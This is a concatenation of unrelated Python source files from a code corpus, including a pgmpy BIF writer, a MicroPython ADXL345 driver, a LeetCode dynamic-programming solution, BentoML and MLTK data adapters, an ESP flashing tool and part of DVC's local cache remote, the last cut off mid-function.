>>> model = BIFReader('dog-problem.bif').get_model()
>>> writer = BIFWriter(model)
>>> writer.get_cpds()
{'bowel-problem': array([ 0.01, 0.99]),
'dog-out': array([ 0.99, 0.97, 0.9 , 0.3 , 0.01, 0.03, 0.1 , 0.7 ]),
'family-out': array([ 0.15, 0.85]),
'hear-bark': array([ 0.7 , 0.01, 0.3 , 0.99]),
'light-on': array([ 0.6 , 0.05, 0.4 , 0.95])}
"""
cpds = self.model.get_cpds()
tables = {}
for cpd in cpds:
tables[cpd.variable] = cpd.values.ravel()
return tables
def write_bif(self, filename):
"""
Writes the BIF data into a file
Parameters
----------
filename : Name of the file
Example
-------
>>> from pgmpy.utils import get_example_model
>>> from pgmpy.readwrite import BIFReader, BIFWriter
>>> asia = get_example_model('asia')
>>> writer = BIFWriter(asia)
>>> writer.write_bif(filename='asia.bif')
"""
writer = self.__str__()
with open(filename, "w") as fout:
fout.write(writer)
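if __name__ == "__main__":
    # Small round-trip sketch (not part of the library): read a BIF file into a
    # BayesianNetwork and write it back out. The file name 'dog-problem.bif' is
    # only an example path and is assumed to exist locally.
    _model = BIFReader("dog-problem.bif").get_model()
    BIFWriter(_model).write_bif("dog-problem-copy.bif")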
|
the-stack_106_14787
|
from machine import Pin, I2C
from micropython import const
import math
import time
device = const(0x53)
regAddress = const(0x32)
TO_READ = 6
buff = bytearray(6)
class ADXL345:
def __init__(self,i2c,addr=device):
self.addr = addr
self.i2c = i2c
b = bytearray(1)
b[0] = 0
self.i2c.writeto_mem(self.addr,0x2d,b)
b[0] = 16
self.i2c.writeto_mem(self.addr,0x2d,b)
b[0] = 8
self.i2c.writeto_mem(self.addr,0x2d,b)
@property
def xValue(self):
buff = self.i2c.readfrom_mem(self.addr,regAddress,TO_READ)
x = (int(buff[1]) << 8) | buff[0]
if x > 32767:
x -= 65536
return x
@property
def yValue(self):
buff = self.i2c.readfrom_mem(self.addr,regAddress,TO_READ)
y = (int(buff[3]) << 8) | buff[2]
if y > 32767:
y -= 65536
return y
@property
def zValue(self):
buff = self.i2c.readfrom_mem(self.addr,regAddress,TO_READ)
z = (int(buff[5]) << 8) | buff[4]
if z > 32767:
z -= 65536
return z
def RP_calculate(self,x,y,z):
roll = math.atan2(y , z) * 57.3
pitch = math.atan2((- x) , math.sqrt(y * y + z * z)) * 57.3
return roll,pitch
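if __name__ == "__main__":
    # Minimal MicroPython usage sketch (not part of the original driver). The
    # I2C bus id and the SCL/SDA pin numbers below are board-specific
    # assumptions, shown here for a typical ESP32 layout.
    i2c = I2C(0, scl=Pin(22), sda=Pin(21))
    accel = ADXL345(i2c)
    for _ in range(5):
        roll, pitch = accel.RP_calculate(accel.xValue, accel.yValue, accel.zValue)
        print("roll:", roll, "pitch:", pitch)
        time.sleep(0.5)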
|
the-stack_106_14788
|
class Language:
verbose_name = None
language_id = None
def load(client):
headers = {"Content-Type": "application/json"}
r = client.endpoint.get(f"{client.endpoint}/submissions/", headers=headers)
r.raise_for_status()
languages = []
for l in r.json():
language = Language()
language.verbose_name = l["name"]
language.language_id = l["id"]
languages.append(language)
return languages
|
the-stack_106_14790
|
# https://leetcode.com/problems/house-robber/
# You are a professional robber planning to rob houses along a street. Each house
# has a certain amount of money stashed, the only constraint stopping you from
# robbing each of them is that adjacent houses have security systems connected and
# it will automatically contact the police if two adjacent houses were broken into
# on the same night.
# Given an integer array nums representing the amount of money of each house,
# return the maximum amount of money you can rob tonight without alerting the
# police.
################################################################################
# dp[i] = max money in nums[0...i-1]
# dp[i] = max(dp[i-1], dp[i-2] + nums[i-1])
from typing import List


class Solution:
def rob(self, nums: List[int]) -> int:
if len(nums) == 1: return nums[0]
# base
n = len(nums)
dp = [0] * (n + 1)
dp[1] = nums[0]
# dp
for i in range(2, n + 1):
dp[i] = max(dp[i-1], # not rob nums[i-1]
dp[i-2] + nums[i-1]) # rob nums[i-1]
return dp[-1]
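if __name__ == "__main__":
    # Quick sanity checks (illustrative only, not part of the original
    # submission); the expected values follow directly from the recurrence above.
    assert Solution().rob([1, 2, 3, 1]) == 4        # rob houses 0 and 2
    assert Solution().rob([2, 7, 9, 3, 1]) == 12    # rob houses 0, 2 and 4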
|
the-stack_106_14792
|
import numpy as np
import sharpy.utils.algebra as algebra
def flightcon_file_parser(fc_dict):
fc = fc_dict['FlightCon']
fc['u_inf'] = float(fc['u_inf'])
fc['alpha'] = float(fc['alpha'])*np.pi/180.0
fc['beta'] = float(fc['beta'])*np.pi/180.0
fc['rho_inf'] = float(fc['rho_inf'])
fc['c_ref'] = float(fc['c_ref'])
fc['b_ref'] = float(fc['b_ref'])
def alpha_beta_to_direction(alpha, beta):
direction = np.array([1, 0, 0])
alpha_rot = algebra.rotation3d_y(alpha)
beta_rot = algebra.rotation3d_z(beta)
direction = np.dot(beta_rot, np.dot(alpha_rot, direction))
return direction
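if __name__ == "__main__":
    # Illustrative check (not part of the original module; assumes
    # alpha_beta_to_direction is exposed at module level as written above).
    # With zero incidence the freestream direction is the body x axis; a pure
    # angle of attack tilts it in the x-z plane.
    print(alpha_beta_to_direction(0.0, 0.0))                # -> [1. 0. 0.]
    print(alpha_beta_to_direction(np.deg2rad(5.0), 0.0))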
|
the-stack_106_14795
|
from ..tre_elements import TREExtension, TREElement
__classification__ = "UNCLASSIFIED"
__author__ = "Thomas McCullough"
class AIS(TREElement):
def __init__(self, value):
super(AIS, self).__init__()
self.add_field('AISDLVL', 's', 3, value)
class PIXQUAL(TREElement):
def __init__(self, value):
super(PIXQUAL, self).__init__()
self.add_field('PQ_CONDITION', 's', 40, value)
class PIXQLAType(TREElement):
def __init__(self, value):
super(PIXQLAType, self).__init__()
self.add_field('NUMAIS', 's', 3, value)
if self.NUMAIS != 'ALL':
self.add_loop('AISs', int(self.NUMAIS), AIS, value)
self.add_field('NPIXQUAL', 'd', 4, value)
self.add_field('PQ_BIT_VALUE', 's', 1, value)
self.add_loop('PIXQUALs', self.NPIXQUAL, PIXQUAL, value)
class PIXQLA(TREExtension):
_tag_value = 'PIXQLA'
_data_type = PIXQLAType
|
the-stack_106_14796
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import BinaryIO, Iterable, Sequence, Tuple
from bentoml.adapters.file_input import FileInput
from bentoml.adapters.utils import (
check_file_extension,
get_default_accept_image_formats,
)
from bentoml.types import InferenceTask
from bentoml.utils.lazy_loader import LazyLoader
# BentoML optional dependencies, using lazy load to avoid ImportError
imageio = LazyLoader('imageio', globals(), 'imageio')
numpy = LazyLoader('numpy', globals(), 'numpy')
ApiFuncArgs = Tuple[
Sequence['numpy.ndarray'],
]
class ImageInput(FileInput):
"""Transform incoming image data from http request, cli or lambda event into numpy
array.
Handle incoming image data from different sources, transform them into numpy array
and pass down to user defined API functions
* If you want to operate raw image file stream or PIL.Image objects, use lowlevel
alternative FileInput.
Args:
accept_image_formats (string[]): A list of acceptable image formats.
Default value is loaded from bentoml config
'apiserver/default_image_input_accept_file_extensions', which is
set to ['.jpg', '.png', '.jpeg', '.tiff', '.webp', '.bmp'] by default.
List of all supported format can be found here:
https://imageio.readthedocs.io/en/stable/formats.html
pilmode (string): The pilmode to be used for reading image file into numpy
array. Default value is 'RGB'. Find more information at:
https://imageio.readthedocs.io/en/stable/format_png-pil.html
Raises:
ImportError: imageio package is required to use ImageInput
Example:
>>> from bentoml import BentoService, api, artifacts
>>> from bentoml.frameworks.tensorflow import TensorflowSavedModelArtifact
>>> from bentoml.adapters import ImageInput
>>>
>>> CLASS_NAMES = ['cat', 'dog']
>>>
>>> @artifacts([TensorflowSavedModelArtifact('classifier')])
>>> class PetClassification(BentoService):
>>> @api(input=ImageInput())
>>> def predict(self, image_ndarrays):
        >>>        results = self.artifacts.classifier.predict(image_ndarrays)
>>> return [CLASS_NAMES[r] for r in results]
"""
def __init__(
self, accept_image_formats=None, pilmode="RGB", **base_kwargs,
):
assert imageio, "`imageio` dependency can be imported"
super().__init__(**base_kwargs)
if 'input_names' in base_kwargs:
raise TypeError(
"ImageInput doesn't take input_names as parameters since bentoml 0.8."
"Update your Service definition "
"or use LegacyImageInput instead(not recommended)."
)
self.pilmode = pilmode
self.accept_image_formats = set(
accept_image_formats or get_default_accept_image_formats()
)
@property
def config(self):
return {
# Converting to list, google.protobuf.Struct does not work with tuple type
"accept_image_formats": list(self.accept_image_formats),
"pilmode": self.pilmode,
}
@property
def request_schema(self):
return {
"image/*": {"schema": {"type": "string", "format": "binary"}},
"multipart/form-data": {
"schema": {
"type": "object",
"properties": {
"image_file": {"type": "string", "format": "binary"}
},
}
},
}
@property
def pip_dependencies(self):
return ["imageio"]
def extract_user_func_args(
self, tasks: Iterable[InferenceTask[BinaryIO]]
) -> ApiFuncArgs:
img_list = []
for task in tasks:
if getattr(task.data, "name", None) and not check_file_extension(
task.data.name, self.accept_image_formats
):
task.discard(
http_status=400,
err_msg=f"Current service only accepts "
f"{self.accept_image_formats} formats",
)
continue
try:
img_array = imageio.imread(task.data, pilmode=self.pilmode)
img_list.append(img_array)
except ValueError as e:
task.discard(http_status=400, err_msg=str(e))
return (img_list,)
|
the-stack_106_14797
|
"""Utilities for real-time data augmentation on image data.
"""
from typing import List, Tuple
import os
import threading
import queue
import inspect
import numpy as np
from mltk.core import get_mltk_logger
from mltk.core.keras import DataSequence
from mltk.utils.process_pool_manager import ProcessPoolManager
class ParallelIterator(DataSequence):
"""Base class for image data iterators.
# Arguments
n: Integer, total number of samples in the dataset to loop over.
batch_size: Integer, size of a batch.
shuffle: Boolean, whether to shuffle the data between epochs.
seed: Random seeding for data shuffling.
"""
white_list_formats = ('wav')
def __init__(self, n, batch_size, shuffle, seed, process_params):
super().__init__()
self.n = n
self.batch_size = batch_size
self.seed = seed
self.total_batches_seen = 0
self.batch_index = 0
self.shuffle = shuffle
self.process_params = process_params
self.batch_generation_started = threading.Event()
self.batch_generation_shutdown = threading.Event()
self.batch_data = BatchData(len(self), self.shuffle, shutdown_event=self.batch_generation_shutdown)
t = threading.Thread(
target=self._generate_batch_data_safe,
name=f'Batch data generator:{process_params.subset}'
)
        t.daemon = True
t.start()
pool_manager_kwargs = dict(
cores=self.cores,
callback=self._on_batch_data_ready,
debug=self.debug,
)
        # If disable_gpu_in_subprocesses is specified, add the
        # CUDA_VISIBLE_DEVICES=-1 environment variable so TF doesn't use the
        # GPU in the subprocesses
if self.disable_gpu_in_subprocesses:
pool_manager_kwargs['env'] = dict(
CUDA_VISIBLE_DEVICES='-1',
)
# Re-use the processing pool if one has already been created
if '_multiprocess_pool' in globals():
pool_manager_kwargs['pool'] = globals()['_multiprocess_pool']
self.pool = ProcessPoolManager(**pool_manager_kwargs)
globals()['_multiprocess_pool'] = self.pool.pool
def reset(self):
self.batch_generation_started.clear()
self.batch_data.reset()
self.pool.reset()
self.batch_data.reset()
def shutdown(self):
self.batch_generation_shutdown.set()
self.reset()
self.pool.close()
if '_multiprocess_pool' in globals():
del globals()['_multiprocess_pool']
def __getitem__(self, idx):
if idx >= len(self):
raise ValueError('Asked to retrieve element {idx}, '
'but the Sequence '
'has length {length}'.format(idx=idx,
length=len(self)))
if self.batch_generation_shutdown.is_set():
raise Exception('Data generator has been shutdown')
self.batch_generation_started.set()
return self.batch_data.get(idx)
def __len__(self):
return (self.n + self.batch_size - 1) // self.batch_size # round up
def on_epoch_end(self):
pass
def __iter__(self):
# Needed if we want to do something like:
# for x, y in data_gen.flow(...):
self.batch_index = 0
return self
def __next__(self, *args, **kwargs):
return self.next(*args, **kwargs)
def next(self):
"""For python 2.x.
# Returns
The next batch.
"""
if self.batch_index >= len(self):
# Clear the started flag, but do NOT reset
# This way we don't waste any processed batch data
self.batch_generation_started.clear()
raise StopIteration()
if self.batch_generation_shutdown.is_set():
raise Exception('Data generator has been shutdown')
self.batch_generation_started.set()
retval = self.batch_data.get(self.batch_index)
self.batch_index += 1
return retval
def _generate_batch_data_safe(self):
try:
self._generate_batch_data()
except Exception as e:
get_mltk_logger().error(f'Exception during batch data processing, err: {e}', exc_info=e)
self.shutdown()
def _generate_batch_data(self):
while not self.batch_generation_shutdown.is_set():
# Wait for training to start
if not self.batch_generation_started.wait(timeout=0.1):
continue
if self.seed is not None:
np.random.seed(self.seed + self.total_batches_seen)
if self.shuffle:
index_array = np.random.permutation(self.n)
else:
index_array = np.arange(self.n)
while self.batch_data.have_more_indices:
while self.batch_data.request_count == 0 and self.batch_data.qsize() > self.max_batches_pending:
self.batch_data.wait()
if not self.batch_generation_started.is_set():
break
idx = self.batch_data.next_index()
self.total_batches_seen += 1
offset = idx*self.batch_size
batch_index_chunk = index_array[offset:offset+self.batch_size]
batch_filenames = []
batch_classes = []
for batch_index in batch_index_chunk:
batch_filenames.append(self.filenames[batch_index])
batch_classes.append(self.classes[batch_index])
get_batch_function = self.process_params.get_batch_function or get_batches_of_transformed_samples
if not self.batch_generation_shutdown.is_set():
self.pool.process(
get_batch_function,
idx,
batch_filenames,
batch_classes,
self.process_params
)
self.batch_data.reset_indices()
def _on_batch_data_ready(self, result):
self.batch_data.put(result[0], result[1])
class ParallelProcessParams():
"""Adds methods related to getting batches from filenames
It includes the logic to transform image files to batches.
"""
def __init__(
self,
audio_data_generator,
sample_rate,
sample_length_ms,
sample_shape,
save_to_dir,
save_prefix,
save_format,
subset,
class_indices,
dtype,
frontend_dtype,
directory,
class_mode,
get_batch_function,
noaug_preprocessing_function,
preprocessing_function,
postprocessing_function,
frontend_enabled,
add_channel_dimension
):
self.class_indices = class_indices
self.dtype = dtype
self.frontend_dtype = frontend_dtype
self.directory = directory
self.class_mode = class_mode
self.audio_data_generator = audio_data_generator
self.get_batch_function = get_batch_function
self.noaug_preprocessing_function = noaug_preprocessing_function
self.preprocessing_function = preprocessing_function
self.postprocessing_function = postprocessing_function
self.frontend_enabled = frontend_enabled
self.add_channel_dimension = add_channel_dimension
self.sample_rate = sample_rate
self.sample_length_ms = sample_length_ms
self.sample_shape = sample_shape
if frontend_enabled and len(self.sample_shape) == 2 and add_channel_dimension:
self.sample_shape += (1,) # The 'depth' dimension to 1
self.save_to_dir = save_to_dir
self.save_prefix = save_prefix
self.save_format = save_format
if subset is not None:
validation_split = audio_data_generator.validation_split
if subset == 'validation':
split = (0, validation_split)
elif subset == 'training':
split = (validation_split, 1)
else:
raise ValueError(
'Invalid subset name: %s;'
'expected "training" or "validation"' % (subset,))
else:
split = None
self.split = split
self.subset = subset
def get_batches_of_transformed_samples(
batch_index:int,
filenames:List[str],
classes:List[int],
params:ParallelProcessParams
) -> Tuple[int, Tuple[np.ndarray, np.ndarray]]:
"""Gets a batch of transformed samples.
Arguments:
batch_index: Index of this batch
filenames: List of filenames for this batch
classes: List of class ids mapping to the filenames list
params: Generator parameters
# Returns
A batch of transformed samples: batch_index, (batch_x, batch_y)
"""
import librosa
batch_shape = (len(filenames),) + params.sample_shape
batch_x = np.zeros(batch_shape, dtype=params.dtype)
    # build batch of audio data
for i, filename in enumerate(filenames):
class_id = classes[i]
if filename:
filepath = os.path.join(params.directory, filename)
x, orignal_sr = librosa.load(filepath, sr=None, mono=True, dtype='float32')
else:
orignal_sr = 16000
x = np.zeros((orignal_sr,), dtype='float32')
# At this point,
# x = [sample_length] dtype=float32
if params.noaug_preprocessing_function is not None:
kwargs = _add_optional_callback_arguments(
params.noaug_preprocessing_function,
batch_index=i,
class_id=class_id,
filename=filename,
batch_class_ids=classes,
batch_filenames=filenames
)
x = params.noaug_preprocessing_function(params, x, **kwargs)
if params.subset != 'validation' or params.audio_data_generator.validation_augmentation_enabled:
transform_params = params.audio_data_generator.get_random_transform()
else:
transform_params = params.audio_data_generator.default_transform
# Apply any audio augmentations
# NOTE: If transform_params = default_transform
# Then the audio sample is simply cropped/padded to fit the expected sample length
x = params.audio_data_generator.apply_transform(x, orignal_sr, transform_params)
if params.preprocessing_function is not None:
kwargs = _add_optional_callback_arguments(
params.preprocessing_function,
batch_index=i,
class_id=class_id,
filename=filename,
batch_class_ids=classes,
batch_filenames=filenames
)
x = params.preprocessing_function(params, x, **kwargs)
if params.frontend_enabled:
# If a frontend dtype was specified use that,
# otherwise just use the output dtype
frontend_dtype = params.frontend_dtype or params.dtype
# After point through the frontend,
# x = [height, width] dtype=frontend_dtype
x = params.audio_data_generator.apply_frontend(x, dtype=frontend_dtype)
# Perform any post processing as necessary
if params.postprocessing_function is not None:
kwargs = _add_optional_callback_arguments(
params.postprocessing_function,
batch_index=i,
class_id=class_id,
filename=filename,
batch_class_ids=classes,
batch_filenames=filenames
)
x = params.postprocessing_function(params, x, **kwargs)
if params.frontend_enabled:
# Do any standardizations (which are done using float32 internally)
x = params.audio_data_generator.standardize(x)
if params.add_channel_dimension:
# Convert the sample's shape from [height, width]
# to [height, width, 1]
x = np.expand_dims(x, axis=-1)
batch_x[i] = x
# build batch of labels
if params.class_mode == 'input':
batch_y = batch_x.copy()
elif params.class_mode in {'binary', 'sparse'}:
batch_y = np.empty(len(batch_x), dtype=params.dtype)
for i, class_id in enumerate(classes):
batch_y[i] = class_id
elif params.class_mode == 'categorical':
batch_y = np.zeros((len(batch_x), len(params.class_indices)), dtype=params.dtype)
for i, class_id in enumerate(classes):
batch_y[i, class_id] = 1.
else:
return batch_index, batch_x
return batch_index, (batch_x, batch_y)
class BatchData(object):
def __init__(self, n, shuffle, shutdown_event: threading.Event):
self.n = n
self.shuffle = shuffle
self.batch_data = queue.Queue() if shuffle else {}
self.batch_data_lock = threading.Condition()
self.indices_lock = threading.Condition()
self.indices = [i for i in range(self.n)]
self.requests = []
self.data_event = threading.Event()
self.shutdown_event = shutdown_event
@property
def have_more_indices(self):
with self.indices_lock:
return (len(self.indices) + len(self.requests)) > 0
@property
def request_count(self):
with self.indices_lock:
return len(self.requests)
def reset_indices(self):
with self.indices_lock:
self.indices = [i for i in range(self.n)]
def next_index(self):
with self.indices_lock:
if len(self.requests) > 0:
idx = self.requests.pop(0)
try:
self.indices.remove(idx)
except:
pass
return idx
else:
return self.indices.pop(0)
def wait(self):
self.data_event.clear()
while not self.shutdown_event.is_set():
if self.data_event.wait(timeout=.1):
return True
return False
def reset(self):
if self.shuffle:
while not self.batch_data.empty():
self.batch_data.get()
else:
with self.batch_data_lock:
self.batch_data.clear()
with self.indices_lock:
self.requests = []
self.indices = [i for i in range(self.n)]
def qsize(self):
if self.shuffle:
return self.batch_data.qsize()
else:
with self.batch_data_lock:
return len(self.batch_data)
def put(self, index, value):
if self.shuffle:
self.batch_data.put(value)
else:
with self.batch_data_lock:
self.batch_data[index] = value
self.batch_data_lock.notify_all()
def get(self, index):
if self.shuffle:
while True:
if self.shutdown_event.is_set():
return None
try:
retval = self.batch_data.get(timeout=0.1)
break
except queue.Empty:
continue
else:
with self.batch_data_lock:
if not index in self.batch_data:
with self.indices_lock:
self.requests.append(index)
self.data_event.set()
while index not in self.batch_data:
if self.shutdown_event.is_set():
return None
self.batch_data_lock.wait(timeout=0.1)
retval = self.batch_data[index]
del self.batch_data[index]
self.data_event.set()
return retval
def _add_optional_callback_arguments(
func,
batch_index,
class_id,
filename,
batch_class_ids,
batch_filenames
) -> dict:
retval = {}
args = inspect.getfullargspec(func).args
if 'batch_index' in args:
retval['batch_index'] = batch_index
if 'class_id' in args:
retval['class_id'] = class_id
if 'filename' in args:
retval['filename'] = filename
if 'batch_class_ids' in args:
retval['batch_class_ids'] = batch_class_ids
if 'batch_filenames' in args:
retval['batch_filenames'] = batch_filenames
return retval
|
the-stack_106_14798
|
from __future__ import print_function
import argparse
import sys
import time
from datetime import datetime
import esptool
import serial
from esphomeflasher import const
from esphomeflasher.common import (
ESP32ChipInfo,
EsphomeflasherError,
chip_run_stub,
configure_write_flash_args,
detect_chip,
detect_flash_size,
read_chip_info,
)
from esphomeflasher.const import (
ESP32_DEFAULT_BOOTLOADER_FORMAT,
ESP32_DEFAULT_OTA_DATA,
ESP32_DEFAULT_PARTITIONS,
)
from esphomeflasher.helpers import list_serial_ports
def parse_args(argv):
parser = argparse.ArgumentParser(prog=f"esphomeflasher {const.__version__}")
parser.add_argument("-p", "--port", help="Select the USB/COM port for uploading.")
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument("--esp8266", action="store_true")
group.add_argument("--esp32", action="store_true")
group.add_argument(
"--upload-baud-rate",
type=int,
default=460800,
help="Baud rate to upload with (not for logging)",
)
parser.add_argument(
"--bootloader",
help="(ESP32-only) The bootloader to flash.",
default=ESP32_DEFAULT_BOOTLOADER_FORMAT,
)
parser.add_argument(
"--partitions",
help="(ESP32-only) The partitions to flash.",
default=ESP32_DEFAULT_PARTITIONS,
)
parser.add_argument(
"--otadata",
help="(ESP32-only) The otadata file to flash.",
default=ESP32_DEFAULT_OTA_DATA,
)
parser.add_argument(
"--no-erase", help="Do not erase flash before flashing", action="store_true"
)
parser.add_argument("--show-logs", help="Only show logs", action="store_true")
parser.add_argument("binary", help="The binary image to flash.")
return parser.parse_args(argv[1:])
def select_port(args):
if args.port is not None:
print(f"Using '{args.port}' as serial port.")
return args.port
ports = list_serial_ports()
if not ports:
raise EsphomeflasherError("No serial port found!")
if len(ports) != 1:
print("Found more than one serial port:")
for port, desc in ports:
print(f" * {port} ({desc})")
print("Please choose one with the --port argument.")
raise EsphomeflasherError
print(f"Auto-detected serial port: {ports[0][0]}")
return ports[0][0]
def show_logs(serial_port):
print("Showing logs:")
with serial_port:
while True:
try:
raw = serial_port.readline()
except serial.SerialException:
print("Serial port closed!")
return
text = raw.decode(errors="ignore")
line = text.replace("\r", "").replace("\n", "")
time_ = datetime.now().time().strftime("[%H:%M:%S]")
message = time_ + line
try:
print(message)
except UnicodeEncodeError:
print(message.encode("ascii", "backslashreplace"))
def run_esphomeflasher(argv):
args = parse_args(argv)
port = select_port(args)
if args.show_logs:
serial_port = serial.Serial(port, baudrate=115200)
show_logs(serial_port)
return
try:
# pylint: disable=consider-using-with
firmware = open(args.binary, "rb")
except IOError as err:
raise EsphomeflasherError(f"Error opening binary: {err}") from err
chip = detect_chip(port, args.esp8266, args.esp32)
info = read_chip_info(chip)
print()
print("Chip Info:")
print(f" - Chip Family: {info.family}")
print(f" - Chip Model: {info.model}")
if isinstance(info, ESP32ChipInfo):
print(f" - Number of Cores: {info.num_cores}")
print(f" - Max CPU Frequency: {info.cpu_frequency}")
print(f" - Has Bluetooth: {'YES' if info.has_bluetooth else 'NO'}")
print(f" - Has Embedded Flash: {'YES' if info.has_embedded_flash else 'NO'}")
print(
f" - Has Factory-Calibrated ADC: {'YES' if info.has_factory_calibrated_adc else 'NO'}"
)
else:
print(f" - Chip ID: {info.chip_id:08X}")
print(f" - MAC Address: {info.mac}")
stub_chip = chip_run_stub(chip)
flash_size = None
if args.upload_baud_rate != 115200:
try:
stub_chip.change_baud(args.upload_baud_rate)
except esptool.FatalError as err:
raise EsphomeflasherError(
f"Error changing ESP upload baud rate: {err}"
) from err
# Check if the higher baud rate works
try:
flash_size = detect_flash_size(stub_chip)
except EsphomeflasherError:
# Go back to old baud rate by recreating chip instance
print(
f"Chip does not support baud rate {args.upload_baud_rate}, changing to 115200"
)
# pylint: disable=protected-access
stub_chip._port.close()
chip = detect_chip(port, args.esp8266, args.esp32)
stub_chip = chip_run_stub(chip)
if flash_size is None:
flash_size = detect_flash_size(stub_chip)
print(f" - Flash Size: {flash_size}")
mock_args = configure_write_flash_args(
info, firmware, flash_size, args.bootloader, args.partitions, args.otadata
)
print(f" - Flash Mode: {mock_args.flash_mode}")
print(f" - Flash Frequency: {mock_args.flash_freq.upper()}Hz")
try:
stub_chip.flash_set_parameters(esptool.flash_size_bytes(flash_size))
except esptool.FatalError as err:
raise EsphomeflasherError(f"Error setting flash parameters: {err}") from err
if not args.no_erase:
try:
esptool.erase_flash(stub_chip, mock_args)
except esptool.FatalError as err:
raise EsphomeflasherError(f"Error while erasing flash: {err}") from err
try:
esptool.write_flash(stub_chip, mock_args)
except esptool.FatalError as err:
raise EsphomeflasherError(f"Error while writing flash: {err}") from err
print("Hard Resetting...")
stub_chip.hard_reset()
print("Done! Flashing is complete!")
print()
if args.upload_baud_rate != 115200:
# pylint: disable=protected-access
stub_chip._port.baudrate = 115200
time.sleep(0.05) # get rid of crap sent during baud rate change
# pylint: disable=protected-access
stub_chip._port.flushInput()
# pylint: disable=protected-access
show_logs(stub_chip._port)
def main():
try:
if len(sys.argv) <= 1:
from esphomeflasher import gui
return gui.main() or 0
return run_esphomeflasher(sys.argv) or 0
except EsphomeflasherError as err:
msg = str(err)
if msg:
print(msg)
return 1
except KeyboardInterrupt:
return 1
if __name__ == "__main__":
sys.exit(main())
|
the-stack_106_14800
|
from __future__ import unicode_literals
from copy import copy
from dvc.utils.compat import str, makedirs
import os
import stat
import uuid
import json
import ntpath
import shutil
import posixpath
import logging
from operator import itemgetter
from dvc.system import System
from dvc.remote.base import (
RemoteBase,
STATUS_MAP,
STATUS_NEW,
STATUS_DELETED,
STATUS_MISSING,
)
from dvc.utils import (
remove,
move,
copyfile,
dict_md5,
to_chunks,
tmp_fname,
walk_files,
)
from dvc.utils import LARGE_DIR_SIZE
from dvc.config import Config
from dvc.exceptions import DvcException
from dvc.progress import progress
from concurrent.futures import ThreadPoolExecutor
from dvc.utils.fs import get_mtime_and_size, get_inode
logger = logging.getLogger(__name__)
class RemoteLOCAL(RemoteBase):
scheme = "local"
REGEX = r"^(?P<path>.*)$"
PARAM_CHECKSUM = "md5"
PARAM_PATH = "path"
PARAM_RELPATH = "relpath"
MD5_DIR_SUFFIX = ".dir"
DEFAULT_CACHE_TYPES = ["reflink", "copy"]
CACHE_TYPE_MAP = {
"copy": shutil.copyfile,
"symlink": System.symlink,
"hardlink": System.hardlink,
"reflink": System.reflink,
}
def __init__(self, repo, config):
super(RemoteLOCAL, self).__init__(repo, config)
self.state = self.repo.state if self.repo else None
self.protected = config.get(Config.SECTION_CACHE_PROTECTED, False)
storagepath = config.get(Config.SECTION_AWS_STORAGEPATH, None)
self.cache_dir = config.get(Config.SECTION_REMOTE_URL, storagepath)
if self.cache_dir is not None and not os.path.isabs(self.cache_dir):
cwd = config[Config.PRIVATE_CWD]
self.cache_dir = os.path.abspath(os.path.join(cwd, self.cache_dir))
types = config.get(Config.SECTION_CACHE_TYPE, None)
if types:
if isinstance(types, str):
types = [t.strip() for t in types.split(",")]
self.cache_types = types
else:
self.cache_types = copy(self.DEFAULT_CACHE_TYPES)
if self.cache_dir is not None and not os.path.exists(self.cache_dir):
os.mkdir(self.cache_dir)
self.path_info = {"scheme": "local"}
self._dir_info = {}
@staticmethod
def compat_config(config):
ret = config.copy()
url = ret.pop(Config.SECTION_AWS_STORAGEPATH, "")
ret[Config.SECTION_REMOTE_URL] = url
return ret
@property
def url(self):
return self.cache_dir
@property
def prefix(self):
return self.cache_dir
def list_cache_paths(self):
clist = []
for entry in os.listdir(self.cache_dir):
subdir = os.path.join(self.cache_dir, entry)
if not os.path.isdir(subdir):
continue
for cache in os.listdir(subdir):
clist.append(os.path.join(subdir, cache))
return clist
def get(self, md5):
if not md5:
return None
return os.path.join(self.cache_dir, md5[0:2], md5[2:])
def changed_cache_file(self, md5):
cache = self.get(md5)
if self.state.changed(cache, md5=md5):
if os.path.exists(cache):
msg = "Corrupted cache file {}."
logger.warning(msg.format(os.path.relpath(cache)))
remove(cache)
return True
return False
def exists(self, path_info):
assert not isinstance(path_info, list)
assert path_info["scheme"] == "local"
return os.path.lexists(path_info["path"])
def changed_cache(self, md5):
cache = self.get(md5)
clist = [(cache, md5)]
while True:
if len(clist) == 0:
break
cache, md5 = clist.pop()
if self.changed_cache_file(md5):
return True
if self.is_dir_cache(cache) and self._cache_metadata_changed():
for entry in self.load_dir_cache(md5):
md5 = entry[self.PARAM_CHECKSUM]
cache = self.get(md5)
clist.append((cache, md5))
return False
def link(self, cache, path):
assert os.path.isfile(cache)
dname = os.path.dirname(path)
if not os.path.exists(dname):
os.makedirs(dname)
# NOTE: just create an empty file for an empty cache
if os.path.getsize(cache) == 0:
open(path, "w+").close()
msg = "Created empty file: {} -> {}".format(cache, path)
logger.debug(msg)
return
i = len(self.cache_types)
while i > 0:
try:
self.CACHE_TYPE_MAP[self.cache_types[0]](cache, path)
if self.protected:
os.chmod(path, stat.S_IREAD | stat.S_IRGRP | stat.S_IROTH)
msg = "Created {}'{}': {} -> {}".format(
"protected " if self.protected else "",
self.cache_types[0],
cache,
path,
)
logger.debug(msg)
return
except DvcException as exc:
msg = "Cache type '{}' is not supported: {}"
logger.debug(msg.format(self.cache_types[0], str(exc)))
del self.cache_types[0]
i -= 1
raise DvcException("no possible cache types left to try out.")
@property
def ospath(self):
if os.name == "nt":
return ntpath
return posixpath
@classmethod
def to_ospath(cls, path):
if os.name == "nt":
return cls.ntpath(path)
return cls.unixpath(path)
@staticmethod
def unixpath(path):
assert not ntpath.isabs(path)
assert not posixpath.isabs(path)
return path.replace("\\", "/")
@staticmethod
def ntpath(path):
assert not ntpath.isabs(path)
assert not posixpath.isabs(path)
return path.replace("/", "\\")
def collect_dir_cache(self, dname):
dir_info = []
for root, dirs, files in os.walk(str(dname)):
bar = False
if len(files) > LARGE_DIR_SIZE:
msg = (
"Computing md5 for a large directory {}. "
"This is only done once."
)
logger.info(msg.format(os.path.relpath(root)))
bar = True
title = os.path.relpath(root)
processed = 0
total = len(files)
progress.update_target(title, 0, total)
for fname in files:
path = os.path.join(root, fname)
relpath = self.unixpath(os.path.relpath(path, dname))
if bar:
